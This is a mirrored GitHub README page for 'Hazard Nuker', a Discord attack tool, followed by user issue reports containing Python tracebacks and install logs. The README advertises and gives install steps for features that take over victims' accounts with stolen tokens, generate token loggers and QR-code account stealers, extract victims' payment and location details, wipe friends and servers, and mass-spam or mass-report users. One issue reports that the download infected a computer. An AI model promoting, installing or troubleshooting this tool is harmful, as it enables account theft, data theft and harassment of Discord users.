Code Monkey home page Code Monkey logo

hazard-nuker-mirror's Introduction

HazardNuker

Installation | Important | Changelogs | Discord


NOTE: Hazard is not finished! You can expect bugs, crashes, and non-working functions. Please make an issue if you find a bug! ㅤ

Hazard Nuker was made with

Love ❌
Code ✅

- Features -

  • Settings (Change the Color Theme, Thread Amount, Hotkeys and more!)
  • Both Compact and Feature-Rich
  • QoL Features such as Auto-Update, proxy scraping and more!
  • Easy to use!
  • Fast and Efficient (Low Performance Impact)
  • Linux Support! (Expect Bugs)
  • Create a token logger or QR code stealer!
  • Nuke an account!
  • Change an accounts Status, Bio, or HypeSquad house!
  • Mass DM using an account!
  • Log into an account with an isolated browser!
  • Mass Report a user or server!
  • Group Chat Spam!
  • Webhook Nuker/Deleter
  • And much, much more!

Features in detail

All features in detail! (Drop Down)

[1] Nuke a targetted account

  • Basically all account nuker-based options
  • Uses Everything! (Mass DM, Create & Delete Servers, Change Language and Theme)
  • It will remove all their friends and DMs as well
  • Basically, it will shit on their account.
  • Everything is logged in the command window, so you can see it all happening in real time

[2] Unfriend all friends

  • Removes all friends from the victim

[3] Delete and leave all servers

  • Leaves/Deletes any servers a user is in

[4] Spam Create New servers

  • Creates 100 servers!
  • Can choose a server icon aswell as a name or have it pick a random one.

[5] DM Deleter

  • Closes/Deletes all DMs with other users! (Will also leave group chats)

[6] Mass DM

  • Message all friends of a user with a custom message!

[7] Enable seizure mode

  • Switches between Light & Dark mode every second or so!
  • Also cycles through all the languages.

[8] Get information from a targetted account

Returns a lot of user info based on a token!

  • Username, Discriminator, Creation Date and other user info!
  • Their personal info (such as Language, Creation Date, Email and more!)
  • Their avatar URL, 2FA status, Nitro Info (Type & Days left, if they have Nitro)
  • Payment method, and basic info about it (Address, Number, Payment Status, PayPal info if they use that)
  • Geolocational Info, such as their Country, Region, City and more!
  • And all the other info you could think of!

[9] Log into an account

  • Log into a users account with their token!
  • Supports Chrome, Edge, and Opera!

[10] Block Friends

  • Blocks all their friends

[11] Profile Changer

  • Allows you to modify their Status, Bio, and Hypequad Badge.

[12] COMING SOON!

HazardNukerSneakPeek

[13] Create Token Grabber

Creates a token logger based off the Hazard Stealer V2! (You can find a link to the source code here)

[14] QR Code Grabber

Creates a QR code! If someone scans the QR code, you can gain access to their account!

The webhook notification looks like this:

[15] Mass Report

  • Reports a user until you stop it.

[16] GroupChat Spammer

  • Create a bunch of GCs with a specified user or random ones.

[17] Webhook Destroyer

  • Spam & Delete any valid webhook!

[18] Settings

Change the following:

  • Theme
  • Threads
  • Hotkeys
  • Exit

❗ Important

  • Found a bug? Join the Discord and contact me (Rdimo) or create an issue about it directly in here!

WARNING: Many people have been selling/distributing infected versions of Hazard Nuker. DO NOT install Hazard Nuker from any place other than this page. If you install it from somewhere else, expect to be Hacked/Scammed.

🤓 Dear Skids

Good for you, you decided to skid something.
We can't stop you, but just know you're pathetic.

I hope you end up on the streets begging for spare change.

Installation

Compiled Version (Easier but more buggy)

Visit: https://github.com/KDot227/hazard-nuker-mirror/releases
Download the latest release (Hazard.zip) and extract the EXE to your desktop.
Finally, run the executable and enjoy!

Source Code Version (More complicated but less buggy)

Click the green "Code" button.
Click "Download ZIP"
Extract the ZIP to a folder.

Run setup.bat, which will install all dependencies and open the script.
After that, every time you'd like to use Hazard, simply open start.bat

NOTE: Make sure you have Python 3.9.5 or above installed from python.org (NOT MICROSOFT) & added to path.

🌟 Enjoyed Hazard Nuker? Consider dropping a star :)

Cheataway

Hazard Stealer was created by Rdimo & DeKrypt. + Maintained by K.Dot227

Discord: Rdimo#6969 | DeKrypt#7777 | K.Dot#7122

Website: https://cheataway.com/

Server: https://cheataway.com/invite

hazard-nuker-mirror's People

Contributors

kdot227 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar

hazard-nuker-mirror's Issues

vouch

best shit i have ever seen

Error after running start.bat

Hii, so i ran setup.bat and after it finished running for the first time i ran start.bat and got a error (see below for error). I then tried running setup.bat as a administrator and still got the error afterwards.

Here's the error:

Traceback (most recent call last):
  File "C:\Program Files\Python39\lib\runpy.py", line 197, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Program Files\Python39\lib\runpy.py", line 87, in _run_code
    exec(code, run_globals)
  File "C:\Users\Skye\Downloads\hazard-nuker-mirror-1.4.7\hazard-nuker-mirror-1.4.7\Hazard.py", line 16, in <module>
    import util.accountNuke
  File "C:\Users\Skye\Downloads\hazard-nuker-mirror-1.4.7\hazard-nuker-mirror-1.4.7\util\accountNuke.py", line 7, in <module>
    import Hazard
  File "C:\Users\Skye\Downloads\hazard-nuker-mirror-1.4.7\hazard-nuker-mirror-1.4.7\Hazard.py", line 22, in <module>
    import util.QR_Grabber
  File "C:\Users\Skye\Downloads\hazard-nuker-mirror-1.4.7\hazard-nuker-mirror-1.4.7\util\QR_Grabber.py", line 17, in <module>
    from cairosvg import svg2png
  File "C:\Users\Skye\AppData\Roaming\Python\Python39\site-packages\cairosvg\__init__.py", line 26, in <module>
    from . import surface  # noqa isort:skip
  File "C:\Users\Skye\AppData\Roaming\Python\Python39\site-packages\cairosvg\surface.py", line 9, in <module>
    import cairocffi as cairo
  File "C:\Users\Skye\AppData\Roaming\Python\Python39\site-packages\cairocffi\__init__.py", line 47, in <module>
    cairo = dlopen(
  File "C:\Users\Skye\AppData\Roaming\Python\Python39\site-packages\cairocffi\__init__.py", line 44, in dlopen
    raise OSError(error_message)  # pragma: no cover
OSError: no library called "cairo-2" was found
no library called "cairo" was found
no library called "libcairo-2" was found
cannot load library 'libcairo.so.2': error 0x7e.  Additionally, ctypes.util.find_library() did not manage to locate a library called 'libcairo.so.2'
cannot load library 'libcairo.2.dylib': error 0x7e.  Additionally, ctypes.util.find_library() did not manage to locate a library called 'libcairo.2.dylib'
cannot load library 'libcairo-2.dll': error 0x7e.  Additionally, ctypes.util.find_library() did not manage to locate a library called 'libcairo-2.dll'
Press any key to continue . . .

My setup.bat looks like this after running:

Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: requests in c:\users\skye\appdata\roaming\python\python39\site-packages (from -r requirements.txt (line 1)) (2.31.0)
Requirement already satisfied: selenium in c:\users\skye\appdata\roaming\python\python39\site-packages (from -r requirements.txt (line 2)) (4.15.2)
Requirement already satisfied: bs4 in c:\users\skye\appdata\roaming\python\python39\site-packages (from -r requirements.txt (line 3)) (0.0.1)
Requirement already satisfied: colorama in c:\program files\python39\lib\site-packages (from -r requirements.txt (line 4)) (0.4.6)
Requirement already satisfied: pycryptodome in c:\program files\python39\lib\site-packages (from -r requirements.txt (line 5)) (3.19.0)
Requirement already satisfied: pypiwin32 in c:\users\skye\appdata\roaming\python\python39\site-packages (from -r requirements.txt (line 6)) (223)
Requirement already satisfied: PIL-Tools in c:\users\skye\appdata\roaming\python\python39\site-packages (from -r requirements.txt (line 7)) (1.1.0)
Requirement already satisfied: pylibcheck in c:\users\skye\appdata\roaming\python\python39\site-packages (from -r requirements.txt (line 8)) (0.2.2)
Requirement already satisfied: pyinstaller in c:\users\skye\appdata\roaming\python\python39\site-packages (from -r requirements.txt (line 9)) (6.2.0)
Requirement already satisfied: psutil in c:\users\skye\appdata\roaming\python\python39\site-packages (from -r requirements.txt (line 10)) (5.9.6)
Requirement already satisfied: keyboard in c:\users\skye\appdata\roaming\python\python39\site-packages (from -r requirements.txt (line 11)) (0.13.5)
Requirement already satisfied: httpx in c:\users\skye\appdata\roaming\python\python39\site-packages (from -r requirements.txt (line 12)) (0.25.2)
Requirement already satisfied: pipwin in c:\users\skye\appdata\roaming\python\python39\site-packages (from -r requirements.txt (line 13)) (0.5.2)
Requirement already satisfied: charset-normalizer<4,>=2 in c:\users\skye\appdata\roaming\python\python39\site-packages (from requests->-r requirements.txt (line 1)) (3.3.2)
Requirement already satisfied: idna<4,>=2.5 in c:\program files\python39\lib\site-packages (from requests->-r requirements.txt (line 1)) (3.4)
Requirement already satisfied: urllib3<3,>=1.21.1 in c:\users\skye\appdata\roaming\python\python39\site-packages (from requests->-r requirements.txt (line 1)) (2.1.0)
Requirement already satisfied: certifi>=2017.4.17 in c:\users\skye\appdata\roaming\python\python39\site-packages (from requests->-r requirements.txt (line 1)) (2023.11.17)
Requirement already satisfied: trio~=0.17 in c:\users\skye\appdata\roaming\python\python39\site-packages (from selenium->-r requirements.txt (line 2)) (0.23.1)
Requirement already satisfied: trio-websocket~=0.9 in c:\users\skye\appdata\roaming\python\python39\site-packages (from selenium->-r requirements.txt (line 2)) (0.11.1)
Requirement already satisfied: beautifulsoup4 in c:\users\skye\appdata\roaming\python\python39\site-packages (from bs4->-r requirements.txt (line 3)) (4.12.2)
Requirement already satisfied: pywin32>=223 in c:\users\skye\appdata\roaming\python\python39\site-packages (from pypiwin32->-r requirements.txt (line 6)) (306)
Requirement already satisfied: Pillow in c:\program files\python39\lib\site-packages (from PIL-Tools->-r requirements.txt (line 7)) (10.1.0)
Requirement already satisfied: setuptools>=42.0.0 in c:\program files\python39\lib\site-packages (from pyinstaller->-r requirements.txt (line 9)) (58.1.0)
Requirement already satisfied: altgraph in c:\users\skye\appdata\roaming\python\python39\site-packages (from pyinstaller->-r requirements.txt (line 9)) (0.17.4)
Requirement already satisfied: pyinstaller-hooks-contrib>=2021.4 in c:\users\skye\appdata\roaming\python\python39\site-packages (from pyinstaller->-r requirements.txt (line 9)) (2023.10)
Requirement already satisfied: packaging>=22.0 in c:\users\skye\appdata\roaming\python\python39\site-packages (from pyinstaller->-r requirements.txt (line 9)) (23.2)
Requirement already satisfied: importlib-metadata>=4.6 in c:\users\skye\appdata\roaming\python\python39\site-packages (from pyinstaller->-r requirements.txt (line 9)) (7.0.0)
Requirement already satisfied: pefile>=2022.5.30 in c:\users\skye\appdata\roaming\python\python39\site-packages (from pyinstaller->-r requirements.txt (line 9)) (2023.2.7)
Requirement already satisfied: pywin32-ctypes>=0.2.1 in c:\users\skye\appdata\roaming\python\python39\site-packages (from pyinstaller->-r requirements.txt (line 9)) (0.2.2)
Requirement already satisfied: anyio in c:\users\skye\appdata\roaming\python\python39\site-packages (from httpx->-r requirements.txt (line 12)) (4.1.0)
Requirement already satisfied: httpcore==1.* in c:\users\skye\appdata\roaming\python\python39\site-packages (from httpx->-r requirements.txt (line 12)) (1.0.2)
Requirement already satisfied: sniffio in c:\users\skye\appdata\roaming\python\python39\site-packages (from httpx->-r requirements.txt (line 12)) (1.3.0)
Requirement already satisfied: h11<0.15,>=0.13 in c:\users\skye\appdata\roaming\python\python39\site-packages (from httpcore==1.*->httpx->-r requirements.txt (line 12)) (0.14.0)
Requirement already satisfied: docopt in c:\users\skye\appdata\roaming\python\python39\site-packages (from pipwin->-r requirements.txt (line 13)) (0.6.2)
Requirement already satisfied: pyprind in c:\users\skye\appdata\roaming\python\python39\site-packages (from pipwin->-r requirements.txt (line 13)) (2.11.3)
Requirement already satisfied: six in c:\program files\python39\lib\site-packages (from pipwin->-r requirements.txt (line 13)) (1.16.0)
Requirement already satisfied: js2py in c:\users\skye\appdata\roaming\python\python39\site-packages (from pipwin->-r requirements.txt (line 13)) (0.74)
Requirement already satisfied: pySmartDL>=1.3.1 in c:\users\skye\appdata\roaming\python\python39\site-packages (from pipwin->-r requirements.txt (line 13)) (1.3.4)
Requirement already satisfied: soupsieve>1.2 in c:\users\skye\appdata\roaming\python\python39\site-packages (from beautifulsoup4->bs4->-r requirements.txt (line 3)) (2.5)
Requirement already satisfied: zipp>=0.5 in c:\users\skye\appdata\roaming\python\python39\site-packages (from importlib-metadata>=4.6->pyinstaller->-r requirements.txt (line 9)) (3.17.0)
Requirement already satisfied: attrs>=20.1.0 in c:\program files\python39\lib\site-packages (from trio~=0.17->selenium->-r requirements.txt (line 2)) (23.1.0)
Requirement already satisfied: sortedcontainers in c:\users\skye\appdata\roaming\python\python39\site-packages (from trio~=0.17->selenium->-r requirements.txt (line 2)) (2.4.0)
Requirement already satisfied: outcome in c:\users\skye\appdata\roaming\python\python39\site-packages (from trio~=0.17->selenium->-r requirements.txt (line 2)) (1.3.0.post0)
Requirement already satisfied: cffi>=1.14 in c:\program files\python39\lib\site-packages (from trio~=0.17->selenium->-r requirements.txt (line 2)) (1.16.0)
Requirement already satisfied: exceptiongroup>=1.0.0rc9 in c:\users\skye\appdata\roaming\python\python39\site-packages (from trio~=0.17->selenium->-r requirements.txt (line 2)) (1.2.0)
Requirement already satisfied: wsproto>=0.14 in c:\users\skye\appdata\roaming\python\python39\site-packages (from trio-websocket~=0.9->selenium->-r requirements.txt (line 2)) (1.2.0)
Requirement already satisfied: pysocks!=1.5.7,<2.0,>=1.5.6 in c:\users\skye\appdata\roaming\python\python39\site-packages (from urllib3[socks]<3,>=1.26->selenium->-r requirements.txt (line 2)) (1.7.1)
Requirement already satisfied: tzlocal>=1.2 in c:\users\skye\appdata\roaming\python\python39\site-packages (from js2py->pipwin->-r requirements.txt (line 13)) (5.2)
Requirement already satisfied: pyjsparser>=2.5.1 in c:\users\skye\appdata\roaming\python\python39\site-packages (from js2py->pipwin->-r requirements.txt (line 13)) (2.7.1)
Requirement already satisfied: pycparser in c:\program files\python39\lib\site-packages (from cffi>=1.14->trio~=0.17->selenium->-r requirements.txt (line 2)) (2.21)
Requirement already satisfied: tzdata in c:\users\skye\appdata\roaming\python\python39\site-packages (from tzlocal>=1.2->js2py->pipwin->-r requirements.txt (line 13)) (2023.3)
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: cairocffi in c:\users\skye\appdata\roaming\python\python39\site-packages (1.6.1)
Requirement already satisfied: cffi>=1.1.0 in c:\program files\python39\lib\site-packages (from cairocffi) (1.16.0)
Requirement already satisfied: pycparser in c:\program files\python39\lib\site-packages (from cffi>=1.1.0->cairocffi) (2.21)
'pipwin' is not recognized as an internal or external command,
operable program or batch file.
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: cairosvg in c:\users\skye\appdata\roaming\python\python39\site-packages (2.7.1)
Requirement already satisfied: cairocffi in c:\users\skye\appdata\roaming\python\python39\site-packages (from cairosvg) (1.6.1)
Requirement already satisfied: cssselect2 in c:\users\skye\appdata\roaming\python\python39\site-packages (from cairosvg) (0.7.0)
Requirement already satisfied: defusedxml in c:\users\skye\appdata\roaming\python\python39\site-packages (from cairosvg) (0.7.1)
Requirement already satisfied: pillow in c:\program files\python39\lib\site-packages (from cairosvg) (10.1.0)
Requirement already satisfied: tinycss2 in c:\users\skye\appdata\roaming\python\python39\site-packages (from cairosvg) (1.2.1)
Requirement already satisfied: cffi>=1.1.0 in c:\program files\python39\lib\site-packages (from cairocffi->cairosvg) (1.16.0)
Requirement already satisfied: webencodings in c:\users\skye\appdata\roaming\python\python39\site-packages (from cssselect2->cairosvg) (0.5.1)
Requirement already satisfied: pycparser in c:\program files\python39\lib\site-packages (from cffi>=1.1.0->cairocffi->cairosvg) (2.21)
Press any key to continue . . .

I hope i sent or gave all the info you need to help me or fix this!! any help would be greatly appriciated thank youuuu

start.bat ending in an error.

I read the error, barely understand it. Nothing wrong that I found. Went through setup.bat, I have python obviously. I don't understand how to fix it though. Any idea what I can do? I'm thinking there are more steps than just exporting the file.

Fix Server Spammer

If possible please fix server spammer as it doesn't create any servers

error plz answe ASAP

Traceback (most recent call last):
File "C:\Users\Ziad\Desktop\hazard-nuker-mirror-1.4.7\Hazard.py", line 14, in
from util.plugins.common import *
File "C:\Users\Ziad\Desktop\hazard-nuker-mirror-1.4.7\util\plugins\common.py", line 15, in
import requests
File "C:\Users\Ziad\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests_init_.py", line 58, in
from . import utils
File "C:\Users\Ziad\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\utils.py", line 30, in
from .cookies import RequestsCookieJar, cookiejar_from_dict
File "C:\Users\Ziad\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\cookies.py", line 160, in
class RequestsCookieJar(cookielib.CookieJar, collections.MutableMapping):
AttributeError: module 'collections' has no attribute 'MutableMapping'

malware

i ran hazard nuker from here and now my computer screen is blue. i think its a torjan virus, do not trust it!!!

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.